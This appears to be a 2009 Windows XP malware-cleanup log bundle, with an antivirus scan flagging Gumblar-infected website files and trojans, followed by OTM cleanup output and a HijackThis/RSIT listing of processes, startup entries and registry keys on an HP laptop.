C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\swfobject.js Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\thankyou.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\top.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\validation1.js Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\vmenu1.js Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\_holding.htm Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v3\archive\gallery.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v3\archive\swfobject.js Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v3\archive\validation1.js Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Documents and Settings\me\My Documents\Azureus Downloads\CorelDraw X4 inc Keygen0I\CorelDRAWGraphicsSuiteX4Installer_EN.exe Infected: Trojan-Downloader.Win32.Tiny.bxv 1
H:\backup\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Quarantine\09CC0002\4BCE6382.VBN Infected: Net-Worm.Win32.Kido.ih 1
H:\backup\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Quarantine\09CC0001\4BFDF086.VBN Infected: Trojan.Win32.Genome.dmy 1
H:\backup\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Quarantine\09CC0000\4BFDED76.VBN Infected: Trojan.Win32.Genome.dmy 1
H:\backup\Velocity Media\Website v3\archive\gallery.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v3\archive\swfobject.js Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v3\archive\validation1.js Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\about.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\bottom.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\contact.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\corpevents.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\creative.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\events.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\gallery.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\gallery2.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\marcom.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\marketing.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\menu.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\menu.js Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\pbrowser_dom.js Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\pbrowser_ie.js Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\pbrowser_iemac.js Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\pbrowser_opera.js Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\pbrowser_safari.js Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\portfolio.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\pr.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\services.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\swfobject.js Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\thankyou.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\top.html Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\validation1.js Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\vmenu1.js Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Website v2\_holding.htm Infected: Trojan-Downloader.JS.Gumblar.a 1
H:\backup\Velocity Media\Web Design\Vector Graphics\645 Vector Design Elements.exe Infected: Trojan-Downloader.Win32.AutoIt.is 1
H:\Data Sorting\Work\Quantum\MSNChecker.exe Infected: not-a-virus:NetTool.Win32.Sniffer.u 1
H:\Data Sorting\Work\Quantum\msnchecker1.1.exe Infected: not-a-virus:NetTool.Win32.Sniffer.u 1
H:\Downloads\Vector Softwares\CorelDraw X4 inc Keygen0I\CorelDRAWGraphicsSuiteX4Installer_EN.exe Infected: Trojan-Downloader.Win32.Tiny.bxv 1

The selected area was scanned.





OTM Log

All processes killed
========== REGISTRY ==========
Registry key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\H\ deleted successfully.
Registry key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{9d3c3908-9f8e-11dd-8976-001302e184fe}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9d3c3908-9f8e-11dd-8976-001302e184fe}\ not found.
Registry key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{b2b2c244-5aae-11de-89f0-001302e184fe}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b2b2c244-5aae-11de-89f0-001302e184fe}\ not found.
========== COMMANDS ==========

[EMPTYTEMP]

User: admin

User: Administrator
->Temp folder emptied: 0 bytes

User: All Users

User: Default User
->Temp folder emptied: 0 bytes

User: Guest
->Temporary Internet Files folder emptied: 0 bytes

User: LocalService
->Temp folder emptied: 0 bytes

User: me
File delete failed. C:\Documents and Settings\me\Local Settings\Temp\~DF97A9.tmp scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\me\Local Settings\Temp\~DFB41A.tmp scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\me\Local Settings\Temp\~DFBA59.tmp scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\me\Local Settings\Temp\~DFBBEA.tmp scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\me\Local Settings\Temp\~DFD930.tmp scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\me\Local Settings\Temp\~DFE17E.tmp scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\me\Local Settings\Temp\~DFEF12.tmp scheduled to be deleted on reboot.
->Temp folder emptied: 15605748 bytes
->Temporary Internet Files folder emptied: 5068720 bytes
->Java cache emptied: 13548123 bytes
->FireFox cache emptied: 0 bytes
->Google Chrome cache emptied: 61863113 bytes

User: NetworkService
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
Windows Temp folder emptied: 0 bytes
RecycleBin emptied: 0 bytes

Total Files Cleaned = 91.63 mb


OTM by OldTimer - Version 3.0.0.5 log created on 08052009_095943

Files moved on Reboot...
File C:\Documents and Settings\me\Local Settings\Temp\~DF97A9.tmp not found!
File C:\Documents and Settings\me\Local Settings\Temp\~DFB41A.tmp not found!
File C:\Documents and Settings\me\Local Settings\Temp\~DFBA59.tmp not found!
File C:\Documents and Settings\me\Local Settings\Temp\~DFBBEA.tmp not found!
File C:\Documents and Settings\me\Local Settings\Temp\~DFD930.tmp not found!
File C:\Documents and Settings\me\Local Settings\Temp\~DFE17E.tmp not found!
File C:\Documents and Settings\me\Local Settings\Temp\~DFEF12.tmp not found!

Registry entries deleted on Reboot...



RSIT Log

Logfile of random's system information tool 1.06 (written by random/random)
Run by me at 2009-08-06 20:17:08
Microsoft Windows XP Home Edition Service Pack 3
System drive C: has 10 GB (15%) free of 66 GB
Total RAM: 1526 MB (22% free)

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 8:17:33 PM, on 8/6/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe
C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
C:\Program Files\Java\jre6\bin\jqs.exe
c:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Symantec\Symantec Endpoint Protection\Rtvscan.exe
C:\Program Files\Symantec\Symantec Endpoint Protection\SmcGui.exe
C:\WINDOWS\notepad.exe
C:\Program Files\hpq\HP Wireless Assistant\HP Wireless Assistant.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Google\Google Talk\googletalk.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
C:\Program Files\Common Files\Teleca Shared\Generic.exe
C:\PROGRA~1\Symbian\Shared\SYMBIA~1\SYMBIA~1.EXE
C:\PROGRA~1\WIDCOMM\BLUETO~1\BTSTAC~1.EXE
C:\PROGRA~1\Symbian\Shared\SYMBIA~1\SCBAL.exe
C:\WINDOWS\explorer.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Java\jre6\bin\java.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Update\1.2.183.7\GoogleCrashHandler.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\WINDOWS\system32\notepad.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\WINDOWS\system32\NOTEPAD.EXE
C:\WINDOWS\system32\NOTEPAD.EXE
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Program Files\Microsoft Office\Office12\EXCEL.EXE
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Program Files\Microsoft Office\Office12\WINWORD.EXE
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Documents and Settings\me\Desktop\RSIT.exe
C:\Program Files\Trend Micro\HijackThis\me.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://ie.redirect.hp.com/svs/rdr?TYPE= ... &pf=laptop
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~1\MICROS~4\Office12\GRA8E1~1.DLL
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files\Google\Google Toolbar\GoogleToolbar.dll
O2 - BHO: AcroIEToolbarHelper Class - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll
O2 - BHO: Google Dictionary Compression sdch - {C84D72FE-E17D-4195-BB24-76C02E2E7C4E} - C:\Program Files\Google\Google Toolbar\Component\fastsearch_A8904FB862BD9564.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll
O3 - Toolbar: Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar.dll
O4 - HKLM\..\Run: [hpWirelessAssistant] C:\Program Files\hpq\HP Wireless Assistant\HP Wireless Assistant.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [QlbCtrl] %ProgramFiles%\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe /Start
O4 - HKLM\..\Run: [googletalk] C:\Program Files\Google\Google Talk\googletalk.exe /autostart
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [MSConfig] C:\WINDOWS\pchealth\helpctr\Binaries\MSCONFIG.EXE /auto
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - Global Startup: Bluetooth.lnk = ?
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~4\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~4\Office12\ONBttnIE.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~4\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {4871A87A-BFDD-4106-8153-FFDE2BAC2967} (DLM Control) - http://dlm.tools.akamai.com/dlmanager/v ... .2.5.0.cab
O16 - DPF: {49232000-16E4-426C-A231-62846947304B} (SysData Class) - https://wimpro.cce.hp.com/ChatEntry/dow ... ysinfo.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/windows ... 4784755890
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/Me ... b56907.cab
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
O16 - DPF: {F9043C85-F6F2-101A-A3C9-08002B2F49FB} (Microsoft Common Dialog Control, version 6.0 (SP6)) - file:///C:/Program%20Files/OpenCube/NavStudio/program/comdlg32.cab
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\PROGRA~1\MICROS~4\Office12\GR99D3~1.DLL
O18 - Filter: x-sdch - {B1759355-3EEC-4C1E-B0F1-B719FE26E377} - C:\Program Files\Google\Google Toolbar\Component\fastsearch_A8904FB862BD9564.dll
O20 - Winlogon Notify: !SASWinLogon - C:\Program Files\SUPERAntiSpyware\SASWINLO.dll
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: LiveUpdate - Symantec Corporation - C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE
O23 - Service: Protexis Licensing V2 (PSI_SVC_2) - Protexis Inc. - c:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe
O23 - Service: Symantec Management Client (SmcService) - Symantec Corporation - C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe
O23 - Service: Symantec Endpoint Protection (Symantec AntiVirus) - Symantec Corporation - C:\Program Files\Symantec\Symantec Endpoint Protection\Rtvscan.exe

--
End of file - 11563 bytes

======Scheduled tasks folder======

C:\WINDOWS\tasks\AppleSoftwareUpdate.job
C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-721153600-2154975418-3561496284-1006Core.job
C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-721153600-2154975418-3561496284-1006UA.job

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}]
Adobe PDF Reader Link Helper - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll [2009-02-27 61816]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
Adobe PDF Link Helper - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27 75128]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3049C3E9-B461-4BC5-8870-4C09146192CA}]
RealPlayer Download and Record Plugin for Internet Explorer - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll [2008-12-25 304736]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}]
Groove GFS Browser Helper - C:\PROGRA~1\MICROS~4\Office12\GRA8E1~1.DLL [2006-10-27 2210608]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}]
Windows Live Sign-in Helper - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-01-22 408448]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AA58ED58-01DD-4d91-8333-CF10577473F7}]
Google Toolbar Helper - C:\Program Files\Google\Google Toolbar\GoogleToolbar.dll [2009-06-05 259696]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AE7CD045-E861-484f-8273-0445EE161910}]
AcroIEToolbarHelper Class - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll [2003-05-15 147456]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{C84D72FE-E17D-4195-BB24-76C02E2E7C4E}]
Google Dictionary Compression sdch - C:\Program Files\Google\Google Toolbar\Component\fastsearch_A8904FB862BD9564.dll [2009-06-05 470512]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre6\bin\jp2ssv.dll [2009-08-04 41368]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
JQSIEStartDetectorImpl Class - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll [2009-08-04 73728]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
{47833539-D0C5-4125-9FA8-0819E2EAAC93} - Adobe PDF - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll [2003-05-15 147456]
Locked
{2318C2B1-4965-11d4-9B18-009027A5CD4F} - Google Toolbar - C:\Program Files\Google\Google Toolbar\GoogleToolbar.dll [2009-06-05 259696]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"hpWirelessAssistant"=C:\Program Files\hpq\HP Wireless Assistant\HP Wireless Assistant.exe [2006-05-04 458752]
"SynTPEnh"=C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2006-06-17 794713]
"HP Software Update"=C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe [2005-02-16 49152]
"QlbCtrl"=C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe [2006-06-19 163840]
"googletalk"=C:\Program Files\Google\Google Talk\googletalk.exe [2007-01-02 3739648]
"ccApp"=C:\Program Files\Common Files\Symantec Shared\ccApp.exe [2009-03-17 115560]
"QuickTime Task"=C:\Program Files\QuickTime\qttask.exe [2009-05-26 413696]
"SunJavaUpdateSched"=C:\Program Files\Java\jre6\bin\jusched.exe [2009-08-04 148888]
"MSConfig"=C:\WINDOWS\pchealth\helpctr\Binaries\MSCONFIG.EXE [2008-04-14 169984]
"iTunesHelper"=C:\Program Files\iTunes\iTunesHelper.exe [2009-06-05 292136]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"msnmsgr"=C:\Program Files\Windows Live\Messenger\msnmsgr.exe [2009-02-06 3885408]
"swg"=C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [2008-11-20 68856]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe Reader Speed Launcher]
C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe [2009-02-27 35696]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ctfmon.exe]
C:\WINDOWS\system32\ctfmon.exe [2008-04-14 15360]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\mRouterConfig]
C:\Program Files\Intuwave\Shared\mRouterRuntime\mRouterConfig.exe [2006-03-02 290816]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\PC Suite for Smartphones]
C:\Program Files\Sony Ericsson\Mobile4\Application Launcher\Application Launcher.exe [2007-05-28 528384]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TkBellExe]
C:\Program Files\Common Files\Real\Update_OB\realsched.exe [2008-12-25 185872]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]
"LiveUpdate"=3
"Adobe LM Service"=3

C:\Documents and Settings\All Users\Start Menu\Programs\Startup
Bluetooth.lnk - C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\!SASWinLogon]
C:\Program Files\SUPERAntiSpyware\SASWINLO.dll [2008-12-22 356352]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\igfxcui]
C:\WINDOWS\system32\igfxdev.dll [2006-03-23 139264]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll [2006-10-18 133632]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{B5A7F190-DDA6-4420-B3BA-52453494E6CD}"=C:\PROGRA~1\MICROS~4\Office12\GRA8E1~1.DLL [2006-10-27 2210608]
"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"=C:\Program Files\SUPERAntiSpyware\SASSEH.DLL [2008-05-13 77824]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ccEvtMgr]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ccSetMgr]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Symantec Antivirus]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\ccEvtMgr]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\ccSetMgr]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\SmcService]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\Symantec Antivirus]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"dontdisplaylastusername"=0
